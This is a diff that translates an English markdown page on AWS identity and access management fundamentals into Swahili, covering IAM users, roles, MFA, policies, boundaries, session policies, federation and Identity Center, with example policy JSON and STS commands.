-- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
+- Kataza akaunti ya mzizi kabisa
+- Ruhusu tu maeneo maalum
+- Ruhusu tu huduma zilizoorodheshwa
+- Kataza GuardDuty, CloudTrail, na S3 Public Block Access kutoka
- being disabled
+kuondolewa
-- Deny security/incident response roles from being deleted or
+- Kataza majukumu ya usalama/mjibu wa tukio kuondolewa au
- modified.
+kubadilishwa.
-- Deny backups from being deleted.
-- Deny creating IAM users and access keys
+- Kataza nakala za akiba kuondolewa.
+- Kataza kuunda watumiaji wa IAM na funguo za ufikiaji
-Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
+Pata **mifano ya JSON** katika [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
### ARN
-**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
-
+**Amazon Resource Name** ni **jina la kipekee** kila rasilimali ndani ya AWS ina, imeundwa kama ifuatavyo:
```
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
-
Note that there are 4 partitions in AWS but only 3 ways to call them:
- AWS Standard: `aws`
@@ -86,246 +80,240 @@ Note that there are 4 partitions in AWS but only 3 ways to call them:
- AWS US public Internet (GovCloud): `aws-us-gov`
- AWS Secret (US Classified): `aws`
-## IAM - Identity and Access Management
+## IAM - Usimamizi wa Utambulisho na Ufikiaji
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
+IAM ni huduma itakayokuruhusu kusimamia **Uthibitishaji**, **Idhini** na **Udhibiti wa Ufikiaji** ndani ya akaunti yako ya AWS.
-- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-- **Access Control** - The method and process of how access is granted to a secure resource
+- **Uthibitishaji** - Mchakato wa kufafanua utambulisho na uthibitisho wa utambulisho huo. Mchakato huu unaweza kugawanywa katika: Utambulisho na uthibitisho.
+- **Idhini** - Inabainisha ni nini utambulisho unaweza kufikia ndani ya mfumo mara tu unapothibitishwa.
+- **Udhibiti wa Ufikiaji** - Njia na mchakato wa jinsi ufikiaji unavyotolewa kwa rasilimali salama.
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
+IAM inaweza kufafanuliwa kwa uwezo wake wa kusimamia, kudhibiti na kuongoza mitambo ya uthibitishaji, idhini na udhibiti wa ufikiaji wa utambulisho kwa rasilimali zako ndani ya akaunti yako ya AWS.
-### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
+### [Mtumiaji wa mizizi ya akaunti ya AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
-When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
+Unapounda akaunti ya Amazon Web Services (AWS) kwa mara ya kwanza, unaanza na utambulisho mmoja wa kuingia ambao una **ufikiaji kamili kwa huduma zote** za AWS na rasilimali katika akaunti. Hii ni akaunti ya AWS _**mtumiaji wa mizizi**_ na inafikiwa kwa kuingia kwa kutumia **anwani ya barua pepe na nenosiri ulilotumia kuunda akaunti**.
-Note that a new **admin user** will have **less permissions that the root user**.
+Kumbuka kwamba mtumiaji mpya wa **admin** atakuwa na **idhini ndogo kuliko mtumiaji wa mizizi**.
-From a security point of view, it's recommended to create other users and avoid using this one.
+Kutoka kwa mtazamo wa usalama, inapendekezwa kuunda watumiaji wengine na kuepuka kutumia huu.
-### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
+### [Watumiaji wa IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
-An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
+Mtumiaji wa IAM ni kiumbe ambacho unaunda katika AWS ili **wakilisha mtu au programu** inayotumia hiyo ili **kuingiliana na AWS**. Mtumiaji katika AWS unajumuisha jina na ithibati (nenosiri na funguo za ufikiaji hadi mbili).
-When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
+Unapounda mtumiaji wa IAM, unampa **idhini** kwa kumfanya kuwa **mwanachama wa kundi la watumiaji** ambalo lina sera za idhini zinazofaa (inapendekezwa), au kwa **kuambatanisha sera moja kwa moja** kwa mtumiaji.
-Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
+Watumiaji wanaweza kuwa na **MFA iliyoanzishwa kuingia** kupitia console. Tokeni za API za watumiaji walioanzisha MFA hazilindwi na MFA. Ikiwa unataka **kudhibiti ufikiaji wa funguo za API za watumiaji kwa kutumia MFA** unahitaji kuashiria katika sera hiyo kwamba ili kutekeleza vitendo fulani MFA inahitaji kuwepo (mfano [**hapa**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
#### CLI
-- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
+- **Kitambulisho cha Funguo za Ufikiaji**: 20 ya herufi kubwa za alphanumeric za nasibu kama AKHDNAPO86BSHKDIRYT
+- **Kitambulisho cha funguo za siri za ufikiaji**: 40 ya herufi kubwa na ndogo za nasibu: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (Haiwezekani kurejesha vitambulisho vya funguo za siri vilivyopotea).
-Whenever you need to **change the Access Key** this is the process you should follow:\
-&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
+Wakati wowote unahitaji **kubadilisha Funguo za Ufikiaji** huu ndio mchakato unapaswa kufuata:\
+&#xNAN;_Cunda funguo mpya za ufikiaji -> Tumia funguo mpya kwenye mfumo/programu -> weka ya awali kama isiyo hai -> Jaribu na thibitisha funguo mpya za ufikiaji zinafanya kazi -> Futa funguo za zamani za ufikiaji_
-### MFA - Multi Factor Authentication
+### MFA - Uthibitishaji wa Vigezo Vingi
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
+Inatumika ku **unda kipengele cha ziada kwa uthibitishaji** pamoja na mbinu zako zilizopo, kama vile nenosiri, hivyo kuunda kiwango cha uthibitishaji wa vigezo vingi.\
+Unaweza kutumia **programu ya bure ya virtual au kifaa halisi**. Unaweza kutumia programu kama uthibitishaji wa google bure kuanzisha MFA katika AWS.
-Policies with MFA conditions can be attached to the following:
+Sera zenye masharti ya MFA zinaweza kuambatanishwa na yafuatayo:
-- An IAM user or group
-- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
-- The trust policy of an IAM role that can be assumed by a user
-
-If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
-Note that **`AssumeRole` credentials don't contain this information**.
+- Mtumiaji wa IAM au kundi
+- Rasilimali kama vile ndoo ya Amazon S3, foleni ya Amazon SQS, au mada ya Amazon SNS
+- Sera ya kuaminika ya jukumu la IAM ambalo linaweza kuchukuliwa na mtumiaji
+Ikiwa unataka **kufikia kupitia CLI** rasilimali ambayo **inaangalia MFA** unahitaji kuita **`GetSessionToken`**. Hiyo itakupa tokeni yenye taarifa kuhusu MFA.\
+Kumbuka kwamba **`AssumeRole` ithibati hazina taarifa hii**.
```bash
aws sts get-session-token --serial-number --token-code
```
+As [**imesemwa hapa**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), kuna kesi nyingi tofauti ambapo **MFA haiwezi kutumika**.
-As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
+### [Makundi ya watumiaji wa IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
-### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
+Kundi la [mtumiaji wa IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) ni njia ya **kuunganisha sera kwa watumiaji wengi** kwa wakati mmoja, ambayo inaweza kurahisisha usimamizi wa ruhusa za watumiaji hao. **Majukumu na makundi hayawezi kuwa sehemu ya kundi**.
-An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
+Unaweza kuunganisha **sera inayotegemea utambulisho kwa kundi la mtumiaji** ili kwamba **watumiaji** wote katika kundi la mtumiaji **wapate ruhusa za sera**. **Huwezi** kutambua **kundi la mtumiaji** kama **`Principal`** katika **sera** (kama sera inayotegemea rasilimali) kwa sababu makundi yanahusiana na ruhusa, si uthibitishaji, na wakuu ni entiti za IAM zilizothibitishwa.
-You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
+Hapa kuna sifa muhimu za makundi ya watumiaji:
-Here are some important characteristics of user groups:
+- Kundi la mtumiaji **linaweza kuwa na watumiaji wengi**, na **mtumiaji** anaweza **kuwa sehemu ya makundi mengi**.
+- **Makundi ya watumiaji hayawezi kuingizwa**; yanaweza kuwa na watumiaji tu, si makundi mengine ya watumiaji.
+- Hakuna **kundi la mtumiaji la default ambalo linajumuisha watumiaji wote katika akaunti ya AWS**. Ikiwa unataka kuwa na kundi la mtumiaji kama hilo, lazima ulunde na kupewa kila mtumiaji mpya.
+- Idadi na ukubwa wa rasilimali za IAM katika akaunti ya AWS, kama vile idadi ya makundi, na idadi ya makundi ambayo mtumiaji anaweza kuwa mwanachama, zimepangwa. Kwa maelezo zaidi, angalia [IAM na AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
-- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
-- **User groups can't be nested**; they can contain only users, not other user groups.
-- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
-- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
+### [Majukumu ya IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
-### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
+**Jukumu la IAM** ni **kama** **mtumiaji**, kwa kuwa ni **utambulisho wenye sera za ruhusa zinazotambulisha kile** kinaweza na hakiwezi kufanya katika AWS. Hata hivyo, jukumu **halina akreditif yoyote** (nenosiri au funguo za ufikiaji) zinazohusishwa nalo. Badala ya kuwa na uhusiano wa kipekee na mtu mmoja, jukumu linakusudia kuwa **linaweza kuchukuliwa na yeyote anayeihitaji (na kuwa na ruhusa za kutosha)**. **Mtumiaji wa IAM anaweza kuchukua jukumu ili kwa muda** kuchukua ruhusa tofauti kwa kazi maalum. Jukumu linaweza **kupewa** [**mtumiaji wa shirikisho**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) anayeingia kwa kutumia mtoa huduma wa utambulisho wa nje badala ya IAM.
-An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
+Jukumu la IAM linajumuisha **aina mbili za sera**: **sera ya kuamini**, ambayo haiwezi kuwa tupu, inayoeleza **nani anaweza kuchukua** jukumu, na **sera ya ruhusa**, ambayo haiwezi kuwa tupu, inayoeleza **nini inaweza kufikiwa**.
-An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
+#### Huduma ya Usalama ya Tokeni ya AWS (STS)
-#### AWS Security Token Service (STS)
+Huduma ya Usalama ya Tokeni ya AWS (STS) ni huduma ya wavuti inayorahisisha **utoaji wa akreditif za muda, zenye ruhusa zilizopunguzwa**. Imeundwa mahsusi kwa:
-AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
+### [Akreditif za muda katika IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
-### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
+**Akreditif za muda zinatumika hasa na majukumu ya IAM**, lakini pia kuna matumizi mengine. Unaweza kuomba akreditif za muda ambazo zina seti ya ruhusa zilizopunguzwa zaidi kuliko mtumiaji wako wa kawaida wa IAM. Hii **inaepuka** wewe **kufanya kazi ambazo haziruhusiwi** na akreditif zilizopunguzwa zaidi. Faida ya akreditif za muda ni kwamba zinakoma moja kwa moja baada ya kipindi fulani. Una udhibiti juu ya muda ambao akreditif hizo ni halali.
-**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
+### Sera
-### Policies
+#### Ruhusa za Sera
-#### Policy Permissions
+Zinatumiwa kupewa ruhusa. Kuna aina 2:
-Are used to assign permissions. There are 2 types:
-
-- AWS managed policies (preconfigured by AWS)
-- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
-
-By **default access** is **denied**, access will be granted if an explicit role has been specified.\
-If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
+- Sera zinazodhibitiwa na AWS (zilizopangwa na AWS)
+- Sera Zinazosimamiwa na Wateja: Zimepangwa na wewe. Unaweza kuunda sera kulingana na sera zinazodhibitiwa na AWS (ukibadilisha moja yao na kuunda yako mwenyewe), ukitumia jenereta ya sera (maoni ya GUI yanayokusaidia kutoa na kukataa ruhusa) au kuandika yako mwenyewe.
+Kwa **default ufikiaji** unakataliwa, ufikiaji utawekwa ikiwa jukumu maalum limeainishwa.\
+Ikiwa **"Deny" moja ipo, itazidi "Allow"**, isipokuwa kwa maombi yanayotumia akreditif za usalama za mizizi ya akaunti ya AWS (ambazo zinaruhusiwa kwa default).
```javascript
{
- "Version": "2012-10-17", //Version of the policy
- "Statement": [ //Main element, there can be more than 1 entry in this array
- {
- "Sid": "Stmt32894y234276923" //Unique identifier (optional)
- "Effect": "Allow", //Allow or deny
- "Action": [ //Actions that will be allowed or denied
- "ec2:AttachVolume",
- "ec2:DetachVolume"
- ],
- "Resource": [ //Resource the action and effect will be applied to
- "arn:aws:ec2:*:*:volume/*",
- "arn:aws:ec2:*:*:instance/*"
- ],
- "Condition": { //Optional element that allow to control when the permission will be effective
- "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
- }
- }
- ]
+"Version": "2012-10-17", //Version of the policy
+"Statement": [ //Main element, there can be more than 1 entry in this array
+{
+"Sid": "Stmt32894y234276923" //Unique identifier (optional)
+"Effect": "Allow", //Allow or deny
+"Action": [ //Actions that will be allowed or denied
+"ec2:AttachVolume",
+"ec2:DetachVolume"
+],
+"Resource": [ //Resource the action and effect will be applied to
+"arn:aws:ec2:*:*:volume/*",
+"arn:aws:ec2:*:*:instance/*"
+],
+"Condition": { //Optional element that allow to control when the permission will be effective
+"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
+}
+}
+]
}
```
+The [sehemu za kimataifa ambazo zinaweza kutumika kwa masharti katika huduma yoyote zimeandikwa hapa](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
+[Sehemu maalum ambazo zinaweza kutumika kwa masharti kwa kila huduma zimeandikwa hapa](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
-The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
-The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
+#### Sera za Ndani
-#### Inline Policies
+Aina hii ya sera ni **zinazopewa moja kwa moja** kwa mtumiaji, kundi au jukumu. Hivyo, hazionekani katika orodha ya Sera kama wengine wanaweza kuzitumia.\
+Sera za ndani ni muhimu ikiwa unataka **kuhifadhi uhusiano mkali wa moja kwa moja kati ya sera na kitambulisho** ambacho kimewekwa. Kwa mfano, unataka kuwa na uhakika kwamba ruhusa katika sera hazitapewa kwa bahati mbaya kwa kitambulisho kingine isipokuwa kile ambacho zimekusudiwa. Unapokuwa unatumia sera ya ndani, ruhusa katika sera hiyo haziwezi kuunganishwa kwa bahati mbaya na kitambulisho kibaya. Zaidi ya hayo, unapokuwa unatumia AWS Management Console kufuta kitambulisho hicho, sera zilizoingizwa katika kitambulisho pia zitatolewa. Hiyo ni kwa sababu ni sehemu ya chombo kikuu.
-This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
+#### Sera za Rasilimali za Ndoo
-#### Resource Bucket Policies
+Hizi ni **sera** ambazo zinaweza kufafanuliwa katika **rasilimali**. **Sio rasilimali zote za AWS zinazozipokea**.
-These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
+Ikiwa chombo hakina kukataa waziwazi juu yao, na sera ya rasilimali inawapa ufikiaji, basi wanaruhusiwa.
-If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
+### Mipaka ya IAM
-### IAM Boundaries
+Mipaka ya IAM inaweza kutumika **kudhibiti ruhusa ambazo mtumiaji au jukumu linapaswa kuwa na ufikiaji**. Kwa njia hii, hata kama seti tofauti za ruhusa zinatolewa kwa mtumiaji na **sera tofauti**, operesheni itashindwa ikiwa atajaribu kuzitumia.
-IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
+Mpaka ni sera tu iliyoambatanishwa na mtumiaji ambayo **inaonyesha kiwango cha juu cha ruhusa ambacho mtumiaji au jukumu linaweza kuwa nacho**. Hivyo, **hata kama mtumiaji ana ufikiaji wa Msimamizi**, ikiwa mpaka inaonyesha anaweza kusoma tu ndoo za SĀ·, hiyo ndiyo kiwango cha juu anachoweza kufanya.
-A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read SĀ· buckets, that's the maximum he can do.
+**Hii**, **SCPs** na **kufuata kanuni ya ruhusa ndogo** ndiyo njia za kudhibiti kwamba watumiaji hawana ruhusa zaidi ya zile anazohitaji.
-**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
+### Sera za Kikao
-### Session Policies
-
-A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
-
-This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
+Sera ya kikao ni **sera inayowekwa wakati jukumu linachukuliwa** kwa namna fulani. Hii itakuwa kama **mpaka wa IAM kwa kikao hicho**: Hii inamaanisha kwamba sera ya kikao haitoi ruhusa bali **inaweka vizuizi kwa zile zilizoonyeshwa katika sera** (ikiwa ruhusa za juu ni zile ambazo jukumu lina).
+Hii ni muhimu kwa **hatua za usalama**: Wakati msimamizi anapokuwa anachukua jukumu lenye mamlaka makubwa anaweza kupunguza ruhusa kuwa zile tu zilizoonyeshwa katika sera ya kikao endapo kikao kitakumbwa na hatari.
```bash
aws sts assume-role \
- --role-arn \
- --role-session-name \
- [--policy-arns ]
- [--policy ]
+--role-arn \
+--role-session-name \
+[--policy-arns ]
+[--policy ]
```
+Note that by default **AWS inaweza kuongeza sera za kikao kwa vikao** ambavyo vitaundwa kwa sababu za tatu. Kwa mfano, katika [roles za cognito zisizo na uthibitisho](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) kwa kawaida (kwa kutumia uthibitisho ulioimarishwa), AWS itaunda **akiba za kikao zenye sera ya kikao** ambayo inakadiria huduma ambazo kikao kinaweza kufikia [**katika orodha ifuatayo**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
-Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
+Hivyo, ikiwa kwa wakati fulani unakutana na kosa "... kwa sababu hakuna sera ya kikao inayoruhusu ...", na jukumu lina ufikiaji wa kutekeleza kitendo hicho, ni kwa sababu **kuna sera ya kikao inayozuia**.
-Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
+### Ushirikiano wa Utambulisho
-### Identity Federation
+Ushirikiano wa utambulisho **unawaruhusu watumiaji kutoka kwa watoa huduma za utambulisho ambao ni nje** ya AWS kufikia rasilimali za AWS kwa usalama bila ya kutoa akiba za mtumiaji wa AWS kutoka kwa akaunti halali ya IAM.\
+Mfano wa mtoa huduma wa utambulisho unaweza kuwa **Microsoft Active Directory** yako mwenyewe (kupitia **SAML**) au huduma za **OpenID** (kama **Google**). Ufikiaji wa ushirikiano utaweza kuruhusu watumiaji ndani yake kufikia AWS.
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
-An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
+Ili kuunda uaminifu huu, **Mtoa Huduma wa Utambulisho wa IAM unaundwa (SAML au OAuth)** ambao utakuwa **na uaminifu** kwa **jukwaa lingine**. Kisha, angalau **jukumu moja linapewa (linaloaminika) kwa Mtoa Huduma wa Utambulisho**. Ikiwa mtumiaji kutoka kwenye jukwaa lililoaminika anafikia AWS, atakuwa akifikia kama jukumu lililotajwa.
-To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
-
-However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
+Hata hivyo, kwa kawaida unataka kutoa **jukumu tofauti kulingana na kundi la mtumiaji** katika jukwaa la upande wa tatu. Kisha, **majukumu kadhaa ya IAM yanaweza kuamini** Mtoa Huduma wa Utambulisho wa upande wa tatu na jukwaa la upande wa tatu litakuwa lile linaloruhusu watumiaji kuchukua jukumu moja au jingine.
-### IAM Identity Center
+### Kituo cha Utambulisho wa IAM
-AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
+Kituo cha Utambulisho wa AWS IAM (mfuasi wa AWS Single Sign-On) kinapanua uwezo wa Usimamizi wa Utambulisho na Ufikiaji wa AWS (IAM) kutoa **mahali pa kati** ambalo linaunganisha **usimamizi wa watumiaji na ufikiaji wao kwa akaunti za AWS** na programu za wingu.
-The login domain is going to be something like `.awsapps.com`.
+Domeni la kuingia litakuwa kitu kama `.awsapps.com`.
-To login users, there are 3 identity sources that can be used:
+Ili kuingia watumiaji, kuna vyanzo 3 vya utambulisho ambavyo vinaweza kutumika:
-- Identity Center Directory: Regular AWS users
-- Active Directory: Supports different connectors
-- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
+- Kituo cha Utambulisho: Watumiaji wa kawaida wa AWS
+- Active Directory: Inasaidia viunganishi tofauti
+- Mtoa Huduma wa Utambulisho wa Nje: Watumiaji wote na makundi yanatoka kwa Mtoa Huduma wa Utambulisho wa Nje (IdP)
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
+Katika kesi rahisi ya kituo cha utambulisho, **Kituo cha Utambulisho kitakuwa na orodha ya watumiaji na makundi** na kitakuwa na uwezo wa **kutoa sera** kwao kwa **akaunti yoyote** ya shirika.
-In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
+Ili kutoa ufikiaji kwa mtumiaji/kundi wa Kituo cha Utambulisho kwa akaunti, **Mtoa Huduma wa Utambulisho wa SAML unaoaminika Kituo cha Utambulisho utaundwa**, na **jukumu linaloaminika Mtoa Huduma wa Utambulisho lenye sera zilizotajwa litaundwa** katika akaunti ya marudio.
#### AwsSSOInlinePolicy
-It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
+Inawezekana **kutoa ruhusa kupitia sera za ndani kwa majukumu yaliyoandaliwa kupitia Kituo cha Utambulisho wa IAM**. Majukumu yaliyoandaliwa katika akaunti zinazotolewa **sera za ndani katika Kituo cha Utambulisho wa AWS** yatakuwa na ruhusa hizi katika sera ya ndani inayoitwa **`AwsSSOInlinePolicy`**.
-Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
+Hivyo, hata kama unaona majukumu 2 yenye sera ya ndani inayoitwa **`AwsSSOInlinePolicy`**, **haimaanishi ina ruhusa sawa**.
-### Cross Account Trusts and Roles
+### Uaminifu na Majukumu ya Akaunti Mbalimbali
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
+**Mtumiaji** (anayeaminika) anaweza kuunda Jukumu la Akaunti Mbalimbali lenye sera fulani na kisha, **kuruhusu mtumiaji mwingine** (aliyeaminika) **kuingia kwenye akaunti yake** lakini tu **akiwa na ufikiaji ulioainishwa katika sera mpya za jukumu**. Ili kuunda hii, tengeneza Jukumu jipya na uchague Jukumu la Akaunti Mbalimbali. Majukumu ya Ufikiaji wa Akaunti Mbalimbali yanatoa chaguzi mbili. Kutoa ufikiaji kati ya akaunti za AWS ambazo unamiliki, na kutoa ufikiaji kati ya akaunti ambayo unamiliki na akaunti ya AWS ya upande wa tatu.\
+Inapendekezwa **kueleza mtumiaji ambaye anaaminika na si kuweka kitu chochote cha jumla** kwa sababu vinginevyo, watumiaji wengine walioidhinishwa kama watumiaji wa ushirikiano wataweza pia kutumia uaminifu huu.
### AWS Simple AD
-Not supported:
+Haitambuliwi:
-- Trust Relations
-- AD Admin Center
-- Full PS API support
-- AD Recycle Bin
-- Group Managed Service Accounts
-- Schema Extensions
-- No Direct access to OS or Instances
+- Mahusiano ya Uaminifu
+- Kituo cha Usimamizi wa AD
+- Msaada kamili wa PS API
+- Kituo cha Recycle cha AD
+- Akaunti za Huduma za Kundi
+- Upanuzi wa Schema
+- Hakuna ufikiaji wa moja kwa moja kwa OS au Mifano
-#### Web Federation or OpenID Authentication
+#### Ushirikiano wa Mtandao au Uthibitishaji wa OpenID
-The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
+Programu inatumia AssumeRoleWithWebIdentity kuunda akiba za muda. Hata hivyo, hii haitoi ufikiaji kwa console ya AWS, bali ufikiaji tu kwa rasilimali ndani ya AWS.
-### Other IAM options
+### Chaguzi Nyingine za IAM
-- You can **set a password policy setting** options like minimum length and password requirements.
